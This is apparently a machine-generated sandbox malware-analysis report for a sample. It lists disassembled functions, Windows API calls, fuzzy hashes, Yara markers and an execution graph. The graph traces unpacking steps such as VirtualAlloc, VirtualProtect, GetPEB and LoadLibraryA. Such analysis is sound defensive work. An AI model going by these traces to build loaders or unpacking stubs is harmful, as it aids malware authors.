                                                                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00412705
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3103352999-0
                                                                                                                                                                                                                                                                          • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                          • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                                                                                                                                                                                                                          Function 024A2959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,024A0DA0), ref: 024A295F
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 024A296C
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2982
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2990
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3103352999-0
                                                                                                                                                                                                                                                                          • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                          • Instruction ID: b69a824207fba3da389de3e87c5744bc4b3fc70d9c3239280e3e36a703973d80
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E02B7410010567C714FBB99C4CBBF32AC7F11B15B600F2BF865E20E0EBA8D1085AAC
                                                                                                                                                                                                                                                                          Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                          • String ID: pow
                                                                                                                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                          • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                                          • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                                                                                                                                                                                                                                          Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 0-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                          • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                                                                                                                                                                                                                          Function 024CB0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024CB32B,?,00000050,?,?,?,?,?), ref: 024CB1AB
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 0-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                          • Instruction ID: 881f8b524cf696cebf662c0ab2fbeb5e74a2be9ad5acf937dfd872c3db22ddc7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B21A96AA40105A6DBA68F5D8D037A7735AEF40BECF66812EE909D7304EF32D941C390
                                                                                                                                                                                                                                                                          Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                                                                                                                                                                                          • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                                                                          • String ID: image/png
                                                                                                                                                                                                                                                                          • API String ID: 864223233-2966254431
                                                                                                                                                                                                                                                                          • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                          • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                                                                                                                                                                                          Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                                                          • String ID: F(@
                                                                                                                                                                                                                                                                          • API String ID: 1452528299-2698495834
                                                                                                                                                                                                                                                                          • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                          • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                                                                                                                                                                                          Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                                          • String ID: F(@$ios_base::failbit set
                                                                                                                                                                                                                                                                          • API String ID: 4194217158-1828034088
                                                                                                                                                                                                                                                                          • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                          • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                                                                                                                                                                                          Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                                          • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                                                                          • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                          • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                                                                                                                                                                                          Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                                                                                                                                                                                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                                                                                                                                                                                            • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                                                                                                                                                                                            • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                                                          • String ID: F@
                                                                                                                                                                                                                                                                          • API String ID: 2118720939-885931407
                                                                                                                                                                                                                                                                          • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                          • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                                                                                                                                                                                          Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                                                                                                                                                                                                                                            • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Access violation - no RTTI data!, xrefs: 00428D7A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                                                                                          • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                                                                                          • API String ID: 2053020834-2158758863
                                                                                                                                                                                                                                                                          • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                                                          • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                                                                                                                                                                                                                                          Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                                                                                                                                                                                          • String ID: zB$~B
                                                                                                                                                                                                                                                                          • API String ID: 3275300208-395995950
                                                                                                                                                                                                                                                                          • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                                          • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                                                                                                                                                                                                                          Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: pThreadProxy
                                                                                                                                                                                                                                                                          • API String ID: 1687795959-3651400591
                                                                                                                                                                                                                                                                          • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                                                          • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                                                                                                                                                                                                                                          Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0042AF2E
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                          • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                          • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A
                                                                                                                                                                                                                                                                          Function 024BB0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02492AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02492AAD,00000000), ref: 024BB187
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 024BB195
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02492AAD,00000000), ref: 024BB1F0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                          • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                          • Instruction ID: 7c2054144e0ca0be18c61295da41c3879ff775182cb29d36a43112ccc1edfe54
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B441E831A00216AFDF279F65CC487EF7BA5EF41759F14416AEC599B2A0DB308901CB70

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:1.6%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:44.4%
                                                                                                                                                                                                                                                                          Signature Coverage:12.7%
                                                                                                                                                                                                                                                                          Total number of Nodes:63
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                                                                                                                          execution_graph 26309 43b068 26310 43b080 26309->26310 26313 43b16e 26310->26313 26315 43a9b0 LdrInitializeThunk 26310->26315 26312 43b23f 26313->26312 26316 43a9b0 LdrInitializeThunk 26313->26316 26315->26313 26316->26312 26317 40b44c 26321 40b45a 26317->26321 26322 40b57c 26317->26322 26318 40b65c 26324 43a950 RtlFreeHeap 26318->26324 26321->26318 26321->26322 26323 43a950 RtlFreeHeap 26321->26323 26323->26318 26324->26322 26325 43aecc 26327 43af00 26325->26327 26326 43af7e 26327->26326 26329 43a9b0 LdrInitializeThunk 26327->26329 26329->26326 26330 408790 26332 40879f 26330->26332 26331 408970 ExitProcess 26332->26331 26333 4087b4 GetCurrentProcessId GetCurrentThreadId 26332->26333 26336 40887a 26332->26336 26334 4087da 26333->26334 26335 4087de SHGetSpecialFolderPathW GetForegroundWindow 26333->26335 26334->26335 26335->26336 26336->26331 26337 ae003c 26338 ae0049 26337->26338 26352 ae0e0f SetErrorMode SetErrorMode 26338->26352 26343 ae0265 26344 ae02ce VirtualProtect 26343->26344 26346 ae030b 26344->26346 26345 ae0439 VirtualFree 26350 ae05f4 LoadLibraryA 26345->26350 26351 ae04be 26345->26351 26346->26345 26347 ae04e3 LoadLibraryA 26347->26351 26349 ae08c7 26350->26349 26351->26347 26351->26350 26353 ae0223 26352->26353 26354 ae0d90 26353->26354 26355 ae0dad 26354->26355 26356 ae0dbb GetPEB 26355->26356 26357 ae0238 VirtualAlloc 26355->26357 26356->26357 26357->26343 26358 438e51 RtlAllocateHeap 26359 43ab91 26360 43ab9a GetForegroundWindow 26359->26360 26361 43abad 26360->26361 26362 438e70 26363 438e83 26362->26363 26364 438e94 26362->26364 26365 438e88 RtlFreeHeap 26363->26365 26365->26364 26371 43b3fb 26372 43b2b5 26371->26372 26372->26372 26373 43b3be 26372->26373 26375 43a9b0 LdrInitializeThunk 26372->26375 26375->26373 26376 bd92e6 26377 bd92f5 26376->26377 26380 bd9a86 26377->26380 26381 bd9aa1 26380->26381 26382 bd9aaa CreateToolhelp32Snapshot 26381->26382 26383 bd9ac6 Module32First 26381->26383 26382->26381 26382->26383 26384 bd9ad5 26383->26384 26386 bd92fe 26383->26386 26387 bd9745 26384->26387 26388 bd9770 26387->26388 26389 bd97b9 26388->26389 26390 bd9781 VirtualAlloc 26388->26390 26389->26389 26390->26389

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                                                          Memory Dump Source
